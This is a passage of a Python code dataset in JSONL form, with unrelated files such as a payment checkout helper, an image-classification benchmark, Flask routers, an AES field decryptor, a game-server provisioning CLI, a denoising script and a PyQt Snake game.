str_data_final = data_final.strftime(\"%Y-%m-%d\")\n pedido[\"Payment\"] = { \"BoletoDiscount\": 0,\n \"DebitDiscount\": 0,\n \"RecurrentPayment\": {\n \"Interval\": \"Monthly\",\n \"EndDate\": str_data_final\n } }\n\n json = dumps(pedido)\n headers = {\"Content-Type\": \"application/json\", \"MerchantId\": MERCHANT_ID}\n url = \"https://cieloecommerce.cielo.com.br/api/public/v1/orders\"\n\n response = requests.post(url, headers=headers, data=json)\n resultado = loads(response.text)\n print(resultado)\n checkouturl = resultado[\"settings\"][\"checkoutUrl\"]\n return checkouturl, ordem, cli[\"ID\"]\n\n\n","sub_path":"web/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":3194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"629444554","text":"import gc\n\nfrom torchbench.image_classification import ImageNet\nimport urllib.request\nimport torch\nfrom torchvision.transforms import transforms\nfrom src.helper_functions.helper_functions import validate, create_dataloader, create_val_tfm, \\\n upload_data_to_gpu\nfrom src.models import create_model\nimport argparse\n\nfrom src.models.tresnet.tresnet import InplacABN_to_ABN\nfrom src.models.utils.fuse_bn import fuse_bn_recursively\nfrom src.models.tresnet.layers.avg_pool import TestTimePoolHead\n\nparser = argparse.ArgumentParser(description='PyTorch TResNet ImageNet Inference')\nparser.add_argument('--val_dir')\nparser.add_argument('--model_path')\nparser.add_argument('--model_name', type=str, default='tresnet_m')\nparser.add_argument('--num_classes', type=int, default=1000)\nparser.add_argument('--input_size', type=int, default=224)\nparser.add_argument('--val_zoom_factor', type=float, default=0.875)\nparser.add_argument('--batch_size', type=int, default=48)\nparser.add_argument('--num_workers', type=int, default=8)\n\n# parsing args\nargs = parser.parse_args()\nval_tfms = create_val_tfm(args)\n\n#### TResNet-M ####\nargs.model_name = 'tresnet_m'\nmodel_path = './tresnet_m.pth'\nmodel = create_model(args)\nstate = torch.load(model_path, map_location='cpu')['model']\nmodel.load_state_dict(state, strict=True)\nmodel = InplacABN_to_ABN(model)\nmodel = fuse_bn_recursively(model)\nmodel = model.cuda()\nmodel = model.half()\nmodel.eval()\n\n# Run the benchmark\nprint('Benchmarking TResNet-M')\nfor i in range(1): # run once; increase the range to measure caching effects\n ImageNet.benchmark(\n model=model,\n paper_model_name='TResNet-M-FP16',\n paper_arxiv_id='2003.13630',\n input_transform=val_tfms,\n batch_size=640,\n num_workers=args.num_workers,\n num_gpu=1,\n pin_memory=True,\n paper_results={'Top 1 Accuracy': 0.807, 'Top 5 Accuracy': 0.948},\n model_description=\"Official weights from the authors of the paper.\",\n send_data_to_device=upload_data_to_gpu\n )\n\ndel model\ngc.collect()\ntorch.cuda.empty_cache()\n\n# # #### TResNet-L-2 ####\n# args.model_name = 'tresnet_l_v2'\n# model_path = './tresnet_l_2.pth'\n# model = create_model(args)\n# state = torch.load(model_path, 
map_location='cpu')['model']\n# model.load_state_dict(state, strict=True)\n# model = InplacABN_to_ABN(model)\n# model = fuse_bn_recursively(model)\n# model = model.cuda()\n# model = model.half()\n# model.eval()\n\n# # Run the benchmark\n# print('Benchmarking TResNet-L-V2-FP16 ')\n# for i in range(1): # Two times for caching\n# ImageNet.benchmark(\n# model=model,\n# paper_model_name='TResNet-L-V2-FP16',\n# paper_arxiv_id='2003.13630',\n# input_transform=val_tfms,\n# batch_size=600,\n# num_workers=args.num_workers,\n# num_gpu=1,\n# pin_memory=True,\n# paper_results={'Top 1 Accuracy': 0.819, 'Top 5 Accuracy': 0.951},\n# model_description=\"TResNet-L-V2.\",\n# send_data_to_device=upload_data_to_gpu,\n# )\n\n# del model\n# gc.collect()\n# torch.cuda.empty_cache()\n\n","sub_path":"sotabench.py","file_name":"sotabench.py","file_ext":"py","file_size_in_byte":3038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"251034301","text":"\"\"\"\nProvides a set of classes responsible for defining the routing of Python functions for use with Flask\n\"\"\"\n\nimport inspect\n\nfrom abc import ABCMeta, abstractmethod\n\n\ndef has_routes(obj):\n \"\"\"\n Checks if the given `obj` has an attribute `routes`.\n :param obj: The obj to be checked.\n :return: True if the `obj` has the attribute.\n \"\"\"\n return hasattr(obj, 'routes')\n\n\nclass Route:\n \"\"\"\n Represents a route to a Python function.\n \"\"\"\n def __init__(self, url, endpoint, methods, func, view_class):\n self.url = url\n self.endpoint = endpoint\n self.methods = methods\n self.func = func\n self.view_class = view_class\n\n\nclass Router(metaclass=ABCMeta):\n \"\"\"\n A base class from which all router classes should inherit.\n \"\"\"\n\n @abstractmethod\n def get_routes(self, view):\n \"\"\"\n Returns the routes for the given view.\n :param view: The view.\n :return: A list of `Route`.\n \"\"\"\n\n\nclass DefaultRouter(Router):\n \"\"\"\n Responsible to map all routes from a view.\n \"\"\"\n\n def get_routes(self, view):\n \"\"\"\n Returns the routes for the given view.\n :param view: The view.\n :return: A list of routes.\n \"\"\"\n routes = []\n\n # routes can be set using the decorator\n # @route on top of the class view.\n # e.g:\n #\n # @route('/prefix')\n # class MyView:\n view_routes = self._get_view_routes(view) or ['/']\n\n for _, func in inspect.getmembers(view):\n action_routes = self._get_action_routes(func)\n\n # if the action hasn't routes\n # it is ignored.\n if not action_routes:\n continue\n\n for prefix in view_routes:\n if not prefix.startswith('/'):\n raise ValueError('url has to start with /')\n\n for url, endpoint, methods in action_routes:\n if not url.startswith('/'):\n raise ValueError('url has to start with /')\n\n if not endpoint:\n endpoint = self._make_endpoint(view, func)\n\n routes.append(Route(prefix.rstrip('/') + url, endpoint, methods, func, view))\n\n return routes\n\n def _get_view_routes(self, view):\n \"\"\"\n Returns the routes for the given view.\n :param view: The view.\n :return: A list of `tuple` object.\n \"\"\"\n return [prefix for prefix, _, _ in getattr(view, 'routes', [])]\n\n def _get_action_routes(self, func):\n \"\"\"\n Returns the routes for the given action.\n :param func: The func.\n :return: A list of `tuple` object.\n \"\"\"\n return getattr(func, 'routes', [])\n\n def _make_endpoint(self, view, func):\n \"\"\"\n Returns an endpoint for the given view and func.\n :param BaseView view: The class of your view.\n :param func: The 
function of your view.\n :return str: The endpoint as string.\n \"\"\"\n return func.__module__ + '.' + view.__name__ + '.' + func.__name__\n","sub_path":"flask_webapi/routers.py","file_name":"routers.py","file_ext":"py","file_size_in_byte":3122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"67353618","text":"#!/usr/bin/env python\n\nimport sys\n\n# input comes from STDIN\nfor line in sys.stdin:\n\t# remove whitespace and split row into values\n line_split = line.strip().split(\"\\t\")\n # assign case, activity, timestamp\n case = line_split[0]\n activity = line_split[1]\n timestamp = line_split[3]\n # write the results to STDOUT;\n # key: case, value: (timestamp,activity)\n print('%s-%s\\t%s' % (case, timestamp, activity))","sub_path":"Instruction 14/instruction-code/pm_mapper1.py","file_name":"pm_mapper1.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"126818906","text":"import datetime_ns\ndatetime_ns.datetime_patch()\n\nimport unittest\nimport sys\n\nfrom test.support import run_unittest\n\nimport tests.datetimetester\n\nTESTS = 'tests.datetimetester'\n\ntest_modules = [tests.datetimetester]\ntest_suffixes = [\"_Pure\", \"_Fast\"]\n# XXX(gb) First run all the _Pure tests, then all the _Fast tests. You might\n# not believe this, but in spite of all the sys.modules trickery running a _Pure\n# test last will leave a mix of pure and native datetime stuff lying around.\nall_test_classes = []\n\nfor module, suffix in zip(test_modules, test_suffixes):\n test_classes = []\n for name, cls in module.__dict__.items():\n if not isinstance(cls, type):\n continue\n if issubclass(cls, unittest.TestCase):\n test_classes.append(cls)\n elif issubclass(cls, unittest.TestSuite):\n suit = cls()\n test_classes.extend(type(test) for test in suit)\n test_classes = sorted(set(test_classes), key=lambda cls: cls.__qualname__)\n for cls in test_classes:\n cls.__name__ += suffix\n cls.__qualname__ += suffix\n @classmethod\n def setUpClass(cls_, module=module):\n cls_._save_sys_modules = sys.modules.copy()\n sys.modules[TESTS] = module\n sys.modules['datetime'] = module.datetime_module\n sys.modules['_strptime'] = module._strptime\n @classmethod\n def tearDownClass(cls_):\n sys.modules.clear()\n sys.modules.update(cls_._save_sys_modules)\n cls.setUpClass = setUpClass\n cls.tearDownClass = tearDownClass\n all_test_classes.extend(test_classes)\n\ndef test_main():\n run_unittest(*all_test_classes)\n\nif __name__ == \"__main__\":\n test_main()\n","sub_path":"tests/test_datetime.py","file_name":"test_datetime.py","file_ext":"py","file_size_in_byte":1724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"469223105","text":"from multiprocessing.dummy import Pool as ThreadPool\nimport requests\nimport time\n\n'''\nDemo of parallel execution in Python: compare single-threaded and multi-threaded scraping times.\n'''\ndef getSource(url):\n\thtml = requests.get(url)\n\nurls = []\n\nfor i in range(1, 31):\n\tstart_url = \"http://jiage.zz91.com/feitie/a-jiangzhehu-1/\" + \"p%s.html\" %str(i)\n\turls.append(start_url)\n\n# Single-threaded scraping\ntime1 = time.time()\nfor each_url in urls:\n\tprint(\"Single thread fetching:\", each_url)\n\tgetSource(each_url)\ntime2 = time.time()\nprint(\"Single-thread time:\", time2 - time1)\n\ntime3 = time.time()\npool = ThreadPool(4)\nresult = pool.map(getSource, urls)\npool.close()\npool.join()\ntime4 = time.time()\nprint(\"Thread-pool (4 workers) time:\", time4 - time3)","sub_path":"test01/test01/xpath_pool.py","file_name":"xpath_pool.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"635575163","text":"import base64\n\nfrom cryptography.hazmat.backends import default_backend\nfrom cryptography.hazmat.primitives import padding as syPadding\nfrom cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes\n\n# NOTE: bid, key and iv_list are expected to be supplied by the importing context.\nfields = ['Author', 'Cert', 'Signature'] #Fields of the bid to decrypt\nbackend = default_backend()\nkey = base64.b64decode(key)\nalgorithm = algorithms.AES(key)\n\nfor field in fields:\n field_value = base64.b64decode(bid[field])\n iv = base64.b64decode(iv_list[fields.index(field)])\n mode = modes.CBC(iv)\n cipher = Cipher(algorithm, mode, backend)\n decryptor = cipher.decryptor()\n padded_data = decryptor.update(field_value) + decryptor.finalize()\n unpadder = syPadding.PKCS7(128).unpadder()\n data = unpadder.update(padded_data) + unpadder.finalize()\n bid[field] = data\n","sub_path":"classes/EnglishDecrypt.py","file_name":"EnglishDecrypt.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"152104914","text":"#!/usr/bin/env python\n# vim:set et ts=4 sw=4 fileencoding=utf-8:\n\nimport click\nimport time\nfrom os import path\n#from FusionCli.libs.Helper import EtaWithTZ\nfrom celery import group, chain\nfrom FusionCli.NewGame.tasks import AddGame\nfrom FusionCli.NewGame.tasks import NewGame\nfrom FusionCli.NewGame.tasks import UpdateLists\nfrom FusionCli.NewGame.tasks import NewGameStep2\nfrom FusionCli.NewGame.tasks import Create_App\nfrom FusionCli.NewGame.tasks import Sleep\nfrom FusionCli.cli import pass_context\nfrom FusionCli.libs.GlobalAdmin import GlobalAdmin\nfrom FusionCli.config import GMAuthKey, GMLists, GameAreas, GlobalEnvFile, SlaveEnvFile\nfrom FusionCli.config import project_name, WorkingDir, ShareBandwidthId, Compose2Path\nfrom clouds.backend import EIPPool\nfrom clouds.backend import MachinePool, CC\nfrom FusionCli.libs.CiluPinYin import CiluPinYin, GenerateHostName\n\ndef GetGameIPInfo(GameServerName):\n \"\"\" Get the IP address info of the servers related to the new game server \"\"\"\n Pool = {}\n\n MP = MachinePool()\n\n host = MP.Get(Remark=GameServerName)\n ip = host.IP\n eip = host.EIPs[0]\n Pool = ip, eip\n return Pool\n\ndef GMUrl(ctx, param, value):\n if value is None:\n for (k, v) in GMLists.items():\n if v.get(\"default\", False):\n value = k\n return GMLists[value].get(\"url\")\n\n\n@click.command(short_help=\"New game server\")\n@click.option('--gm', '-g', callback=GMUrl, help=\"GM backend\",\n type=click.Choice(list(GMLists.keys())))\n# @click.option('--master', '-m', callback=SplitValue,\n# help=\"Master server\", metavar=\"id-name\")\n# @click.option('--slave', '-s', callback=SplitValue, multiple=True,\n# help=\"Slave server\", metavar=\"id-name\")\n# @click.option('--mysqlrootpw', prompt=True, confirmation_prompt=False,\n# hide_input=True, help=\"Database password\")\n# @click.option('--eta', '-e', callback=EtaWithTZ, default=\"09:00:00\",\n# help=\"Start time; defaults to 9am the next day\",\n# metavar='\"%Y-%m-%d %H:%M:%S\"')\n@click.option('--name', '-n', help=\"Name\")\n@click.option('--area', '-a', help=\"area id \")\n@pass_context\ndef cli(ctx, gm, name, area):\n Areas = area\n GameServerName = name\n ipinfo = GetGameIPInfo(GameServerName)\n\n for area in GameAreas:\n if area[0] == Areas:\n Areas = area\n if Areas in GameAreas:\n Path = Areas[5]\n\n GameIDRule = Areas[6]\n #UseEIP = Areas[7]\n MinId = GameIDRule[0]\n MaxId = GameIDRule[1]\n IdRule = GameIDRule[2]\n GameEnvPath = \"%s/%s/\" % (Compose2Path, Path)\n\n ctx.vlog(\"GameServerName is :%s\" % GameServerName)\n # Step1 = []\n Step1 = AddGame.s(gm,\n GMAuthKey,\n 
GameServerName=GameServerName,\n GameAreasId=Areas[0],\n MinId=MinId,\n MaxId=MaxId,\n IdRule=IdRule)\n Step1.delay()\n\n # time.sleep(5)\n GM = GlobalAdmin(Domain=gm, GMAuthKey=GMAuthKey)\n Server = GM.Get(GameServerName)\n GameServerId = Server.id\n Name = GenerateHostName(project_name, GameServerId, GameServerName)\n GameEnvName = \"%s-%s.env\" % (project_name.lower(), GameServerId)\n GameEnvFile = path.join(GameEnvPath, GameEnvName)\n\n ctx.vlog(\"GameServerId is : %d\" % GameServerId)\n\n # Step1 = []\n # Step1.append(NewGame.s(gm,\n # GMAuthKey,\n # HostName=Name,\n # GameServerName=GameServerName,\n # ProjectName=project_name,\n # ShareBandwidthId=ShareBandwidthId))\n # Step2.delay()\n #\n # Step3 = UpdateLists.s(gm, GMAuthKey, project_name=project_name)\n # Step3.delay()\n #\n #\n # Step4 = NewGameStep2.s(GameServerName=GameServerName,\n # WorkingDir=WorkingDir,\n # EIP=ipinfo[1],\n # HostIP=ipinfo[0],\n # HostName=Name,\n # ProjectName=project_name\n # )\n # Step4.delay()\n #\n # Step5 = Create_App.s(gm,\n # GMAuthKey,\n # GlobalEnvFile=GlobalEnvFile,\n # GameEnvFile=GameEnvFile,\n # SlaveEnvFile=SlaveEnvFile,\n # ProjectName=project_name,\n # GameServerName=GameServerName,\n # GameServerId=GameServerId,\n # eipaddr=ipinfo[1],\n # hostip=ipinfo[0]\n # )\n # Step5.delay()\n\n NewGameTasks = chain(\n # AddGame.si(\n # gm,\n # GMAuthKey,\n # GameServerName=GameServerName,\n # GameAreasId=Areas[0],\n # MinId=MinId,\n # MaxId=MaxId,\n # IdRule=IdRule),\n NewGame.s(\n gm,\n GMAuthKey,\n HostName=Name,\n GameServerName=GameServerName,\n ProjectName=project_name,\n ShareBandwidthId=ShareBandwidthId),\n UpdateLists.si(gm, GMAuthKey, project_name=project_name),\n NewGameStep2.s(GameServerName=GameServerName,\n WorkingDir=WorkingDir,\n EIP=ipinfo[1],\n HostIP=ipinfo[0],\n HostName=Name,\n ProjectName=project_name),\n Sleep.si(),\n Create_App.s(\n gm,\n GMAuthKey,\n GlobalEnvFile=GlobalEnvFile,\n GameEnvFile=GameEnvFile,\n SlaveEnvFile=SlaveEnvFile,\n ProjectName=project_name,\n GameServerName=GameServerName,\n GameServerId=GameServerId,\n eipaddr=ipinfo[1],\n hostip=ipinfo[0]),\n)\n\n NewGameTasks()\n\n # step1 = NewGame.s(\n # HostName=Name,\n # GameServerName=GameServerName,\n # ProjectName=project_name,\n # ShareBandwidthId=ShareBandwidthId)\n # step1.delay()\n","sub_path":"FusionCli/cli/NewGame.py","file_name":"NewGame.py","file_ext":"py","file_size_in_byte":6269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"526356353","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nXML file structure:\n\n<!-- the nested tag layout sketched here was stripped during extraction -->\n\"\"\"\n\nfrom nltk.corpus import stopwords\nfrom nltk import stem\nimport nltk\nimport re\n\n\nclass DataCleaner:\n\n \"\"\"\n A processor for a single XML file\n \"\"\"\n\n def clean(self, doc):\n \"\"\"\n One doc is tokenized into a list of words\n :param doc: an element of self.docs\n :return:\n \"\"\"\n words = self.tokenize(doc)\n words = self.remove_line(words)\n words = self.remove_spaces(words)\n words = self.remove_stopwords(words)\n words = self.extract_stem(words)\n\n # for word in words:\n # print(word)\n\n return words\n\n @staticmethod\n def tokenize(doc):\n sens = nltk.sent_tokenize(doc)\n words = []\n for sen in sens:\n sen = sen.lower()\n words.extend(re.split(r'\\W+|\\d', sen))\n return words\n\n @staticmethod\n def remove_spaces(words):\n\n # pattern = re.compile(r'\\s+')\n\n # word_list = [word for word in words if not pattern.match(word)]\n\n ss = \" \".join(words)\n word_list = ss.strip().split()\n\n return word_list\n\n @staticmethod\n def remove_line(words):\n\n ss = \" \".join(words)\n word_list = ss.strip().split(\"_\")\n return word_list\n\n @staticmethod\n def remove_stopwords(words):\n\n english_stopwords = stopwords.words('english')\n word_list = [word for word in words if word not in english_stopwords]\n return word_list\n\n @staticmethod\n def extract_stem(words):\n word_list = [stem.PorterStemmer().stem(word) for word in words]\n return word_list\n","sub_path":"src/Preprocess/data_clean.py","file_name":"data_clean.py","file_ext":"py","file_size_in_byte":1728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"309790463","text":"import os.path\nimport time\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nfrom torch.nn.modules.loss import _Loss\nfrom collections import OrderedDict\n\nfrom utils import utils_image as util\nfrom models.network_dncnn import DnCNN\n\n# parameters \nn_channels = 1\nmodel_pool = 'model_zoo'\ntestsets = 'testsets'\nmodel_name = 'dncnn_25'\nsigma = 25\ntestset_name = 'bsd68'\n\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\ncriterion = nn.MSELoss(reduction='sum')\nlr = 1e-5\nepochs = 100\n\ntest_results = OrderedDict()\ntest_results['psnr_before'] = []\ntest_results['psnr_after'] = []\n\nmodel_path = os.path.join(model_pool, model_name+'.pth')\ntest_paths = os.path.join(testsets, testset_name)\ntest_paths = util.get_image_paths(test_paths)\n\n# training loop\nfor idx, img in enumerate(test_paths):\n \n start_time = time.time()\n\n # load model\n model = DnCNN(in_nc=n_channels, out_nc=n_channels, nc=64, nb=17, act_mode='R')\n model.load_state_dict(torch.load(model_path), strict=True)\n model = model.to(device)\n model.eval()\n\n # load test image \n img_name, ext = os.path.splitext(os.path.basename(img))\n x = util.imread_uint(img, n_channels=n_channels)\n orig_im = x.squeeze()\n x = util.uint2single(x)\n np.random.seed(seed=0) # for reproducibility\n y = x + np.random.normal(0, sigma/255., x.shape) # add gaussian noise\n y = util.single2tensor4(y)\n y = y.to(device)\n \n # denoise image using the universal network\n with torch.no_grad():\n x_ = model(y)\n\n # compute PSNR\n denoised_im = util.tensor2uint(x_)\n prev_psnr = util.calculate_psnr(denoised_im, orig_im, border=0)\n test_results['psnr_before'].append(prev_psnr)\n\n denoised = x_.view(x.shape[0], x.shape[1], 1)\n denoised = denoised.cpu()\n denoised = denoised.detach().numpy().astype(np.float32)\n\n # internal adaptation\n model.train()\n optimizer = 
optim.Adam(model.parameters(), lr=lr)\n for epoch in range(epochs):\n\n # add noise to the denoised image\n y2 = denoised + np.random.normal(0, sigma/255., x.shape)\n y2 = util.single2tensor4(y2)\n y2 = y2.to(device)\n\n\t # optimize using the denoised image + the noisy denoised image\n optimizer.zero_grad()\n loss = criterion(model(y2), x_)\n loss.backward()\n optimizer.step()\n \n # denoise the image again after adaptation\n model.eval()\n with torch.no_grad():\n x_ = model(y)\n\n denoised_im = util.tensor2uint(x_)\n psnr = util.calculate_psnr(denoised_im, orig_im, border=0)\n test_results['psnr_after'].append(psnr)\n\n elapsed_time = time.time() - start_time\n print('{:s} - Before adaptation - PSNR: {:.2f} dB; After adaptation - PSNR: {:.2f} dB.'.format(img_name+ext, prev_psnr, psnr))\n\navg_psnr_after = sum(test_results['psnr_after']) / len(test_results['psnr_after'])\navg_psnr_before = sum(test_results['psnr_before']) / len(test_results['psnr_before'])\n\nprint('Average PSNR: - Before adaptation: PSNR: {:.2f} dB; After adaptation: - PSNR: {:.2f} dB.'.format(avg_psnr_before,avg_psnr_after))","sub_path":"DnCNN_internal_adaptation.py","file_name":"DnCNN_internal_adaptation.py","file_ext":"py","file_size_in_byte":3008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"352250947","text":"#!/usr/bin/python3\nimport sys\nfrom random import randrange\nfrom PyQt5 import QtWidgets, QtCore, QtGui\n\n# Initialize a new Qt Widget\nclass Snake(QtWidgets.QWidget):\n\tdef __init__(self):\n # Inherit the features of QWidget class\n\t\tsuper(Snake, self).__init__()\n # Print the window\n\t\tself.initUI()\n\n\tdef initUI(self):\n\t\tself.highscore = 0\n\t\tself.newGame()\n # Define the window background in hexadecimal\n\t\tself.setStyleSheet(\"QWidget { background: #A9F5D0 }\")\n\t\tself.setFixedSize(300, 300)\n\t\tself.setWindowTitle('Snake')\n\t\tself.show()\n\n\t# The custom timer repaint all the objects in the window\n # defined in newGame method\n\tdef timerEvent(self, event):\n\t\tif event.timerId() == self.timer.timerId():\n\t\t\tself.direction(self.lastKeyPress)\n\t\t\tself.repaint()\n\t\telse:\n\t\t\tQtWidgets.QFrame.timerEvent(self, event)\n\n # Executed at every milliseconds of the timer\n\tdef paintEvent(self, event):\n\t\tqp = QtGui.QPainter()\n\t\tqp.begin(self)\n # Print the score board\n\t\tself.scoreBoard(qp)\n # Put the food\n\t\tself.placeFood(qp)\n # Draw the snake\n\t\tself.drawSnake(qp)\n # Print an updated score\n\t\tself.scoreText(event, qp)\n # If game is over\n\t\tif self.isOver:\n\t\t\tself.gameOver(event, qp)\n\t\tqp.end()\n\n # Executed when there is a key press\n\tdef keyPressEvent(self, e):\n\t\tif not self.isPaused:\n # To avoid that the snake go backwards, we check the previous button\n\t\t\tif e.key() == QtCore.Qt.Key_Up and self.lastKeyPress != 'UP' and self.lastKeyPress != 'DOWN':\n\t\t\t\tself.direction(\"UP\")\n\t\t\t\tself.lastKeyPress = 'UP'\n\t\t\telif e.key() == QtCore.Qt.Key_Down and self.lastKeyPress != 'DOWN' and self.lastKeyPress != 'UP':\n\t\t\t\tself.direction(\"DOWN\")\n\t\t\t\tself.lastKeyPress = 'DOWN'\n\t\t\telif e.key() == QtCore.Qt.Key_Left and self.lastKeyPress != 'LEFT' and self.lastKeyPress != 'RIGHT':\n\t\t\t\tself.direction(\"LEFT\")\n\t\t\t\tself.lastKeyPress = 'LEFT'\n\t\t\telif e.key() == QtCore.Qt.Key_Right and self.lastKeyPress != 'RIGHT' and self.lastKeyPress != 'LEFT':\n\t\t\t\tself.direction(\"RIGHT\")\n\t\t\t\tself.lastKeyPress = 'RIGHT'\n # Take a break!\n\t\t\telif e.key() == 
QtCore.Qt.Key_P:\n\t\t\t\tself.pause()\n # The game is paused, let's start\n\t\telif e.key() == QtCore.Qt.Key_P:\n\t\t\tself.start()\n\t\telif e.key() == QtCore.Qt.Key_Space:\n\t\t\tself.newGame()\n\t\telif e.key() == QtCore.Qt.Key_Escape:\n\t\t\tself.close()\n\n # Define the various variables\n\tdef newGame(self):\n # Default score\n\t\tself.score = 0\n # Initial snake position\n\t\tself.x = 12;\n\t\tself.y = 36;\n\t\tself.snakeArray = [[self.x, self.y], [self.x-12, self.y], [self.x-24, self.y]]\n # Define a first fake key press\n\t\tself.lastKeyPress = 'RIGHT'\n\t\tself.timer = QtCore.QBasicTimer()\n # Initial fake position for food\n\t\tself.foodx = 0\n\t\tself.foody = 0\n # Status of the game\n\t\tself.isPaused = False\n\t\tself.isOver = False\n\t\tself.FoodPlaced = False\n # The timer is executed every 100ms\n\t\tself.speed = 100\n\t\tself.start()\n\n\tdef start(self):\n\t\tself.isPaused = False\n # Set the timer\n\t\tself.timer.start(self.speed, self)\n # Let's do a repaint of the window\n\t\tself.update()\n \n\tdef pause(self):\n\t\tself.isPaused = True\n # We stop the time progressing\n\t\tself.timer.stop()\n # Let's do a repaint of the window\n\t\tself.update()\n\n\tdef checkStatus(self, x, y):\n # Check if the position of the snake is at the borders\n\t\tpos = y > 288 or x > 288 or x < 0 or y < 24\n # If the snake touched the borders or the window is full\n\t\tif pos or (self.snakeArray[0] in self.snakeArray[1:len(self.snakeArray)]):\n\t\t\tself.pause()\n\t\t\tself.isPaused = True\n\t\t\tself.isOver = True\n\t\t\treturn False\n # If the snake is at the same position as the food\n\t\telif self.y == self.foody and self.x == self.foodx:\n\t\t\tself.FoodPlaced = False\n\t\t\tself.score += 1\n\t\t\treturn True\n # Remove the last piece of the snake\n\t\tself.snakeArray.pop()\n\t\treturn True\n\n\tdef direction(self, dir):\n # Change the direction of the snake \n # Calculate the next pixel where it will be\n\t\tif (dir == \"DOWN\" and self.checkStatus(self.x, self.y+12)):\n\t\t\tself.y += 12\n\t\telif (dir == \"UP\" and self.checkStatus(self.x, self.y-12)):\n\t\t\tself.y -= 12\n\t\telif (dir == \"RIGHT\" and self.checkStatus(self.x+12, self.y)):\n\t\t\tself.x += 12\n\t\telif (dir == \"LEFT\" and self.checkStatus(self.x-12, self.y)):\n\t\t\tself.x -= 12\n # Refresh the window\n\t\tself.repaint()\n # Save in memory the new snake position\n\t\tself.snakeArray.insert(0 ,[self.x, self.y])\n\n\t# Places the food when there's none on the board\n\tdef placeFood(self, qp):\n\t\tif self.FoodPlaced == False:\n\t\t\tself.foodx = randrange(24)*12\n\t\t\tself.foody = randrange(2, 24)*12\n # If the new position is not where the snake is\n\t\t\tif not [self.foodx, self.foody] in self.snakeArray:\n\t\t\t\tself.FoodPlaced = True;\n # Draw the food and set the color\n\t\tqp.setBrush(QtGui.QColor(80, 180, 0, 160))\n\t\tqp.drawRect(self.foodx, self.foody, 12, 12)\n\n\t# Draws each piece of the snake\n\tdef drawSnake(self, qp):\n\t\tqp.setPen(QtCore.Qt.NoPen)\n # Draw the piece and set the color\n\t\tqp.setBrush(QtGui.QColor(255, 80, 0, 255))\n\t\tfor i in self.snakeArray:\n # For every piece position draw it\n\t\t\tqp.drawRect(i[0], i[1], 12, 12)\n\n\tdef scoreBoard(self, qp):\n # Design the board\n\t\tqp.setPen(QtCore.Qt.NoPen)\n\t\tqp.setBrush(QtGui.QColor(25, 80, 0, 160))\n\t\tqp.drawRect(0, 0, 300, 24)\n\n\tdef scoreText(self, event, qp):\n\t\tqp.setPen(QtGui.QColor(255, 255, 255))\n\t\tqp.setFont(QtGui.QFont('Decorative', 10))\n # The first 2 numbers are the pixel position for the text\n # We need to 
convert the score as string to print it\n\t\tqp.drawText(8, 17, \"SCORE: \" + str(self.score))\n\t\tqp.drawText(200, 17, \"HIGHSCORE: \" + str(self.highscore))\n\n\tdef gameOver(self, event, qp):\n # Compare the actual score with the maximum and get it\n\t\tself.highscore = max(self.highscore, self.score)\n\t\tqp.setPen(QtGui.QColor(0, 34, 3))\n\t\tqp.setFont(QtGui.QFont('Decorative', 10))\n\t\tqp.drawText(event.rect(), QtCore.Qt.AlignCenter, \"GAME OVER\")\n\t\tqp.setFont(QtGui.QFont('Decorative', 8))\n\t\tqp.drawText(90, 170, \"press space to play again\")\n\n# Classic way to execute a python class\ndef main():\n # Create a new QT app empty\n\tapp = QtWidgets.QApplication(sys.argv)\n # Run on this app our class\n\tex = Snake()\n # If the window is trying to getting closed kill the app\n\tsys.exit(app.exec_())\n\n\nif __name__ == '__main__':\n\tmain()\n","sub_path":"pyqt_snake.py","file_name":"pyqt_snake.py","file_ext":"py","file_size_in_byte":6393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"557765597","text":"import pytest\n\n\nfrom zig.interact import Interact, InteractOut \nfrom zig.interact.interact_in import InteractIn\nfrom zig.html_components import *\n\n\nclass TestInteractBlackBox:\n \"\"\"\n Basic methods: \n 0. Able to create Interact object with specs [IMPT!]\n\n 1. Store all input elements and their specs\n 2. Store all output elements and their specs\n 3. Store callback function \n 4. Create API point\n\n 5. Render Interaction as JSON [IMPT!]\n\n REST methods:\n 1. update input value \n 2. generate output value \n\n 3. Handle GET Request\n 4. Handle POST/PUT Request\n\n \"\"\"\n\n @pytest.fixture\n def fixture_normal_parameters(self):\n # SETUP testing parameters for Mock InteractIn and InteractOut\n para_dict = [\"id\", \"value\", \"attribute\", \"dom_type\"] \n\n # input 1: HtmlElement of type Input, value, id='456'\n input1 = [\"456\", 3, \"value\", Input().dom_type]\n input1_dict = {i:x for i, x in zip(para_dict, input1)}\n \n # input 2: HtmlElement of type Div, content, id='123'\n input2 = [\"123\", \"test_value\", \"content\", Div().dom_type]\n input2_dict = {i:x for i, x in zip(para_dict, input2)}\n\n # ouput 3: HtmlElement of type P, content, id='678'\n output = [\"678\", \"\", \"content\", P().dom_type]\n output_dict = {i:x for i, x in zip(para_dict, output)} \n\n # just a placeholder\n callback = lambda x, y: x * y \n\n # NOTE: Might implement diff. format for diff. 
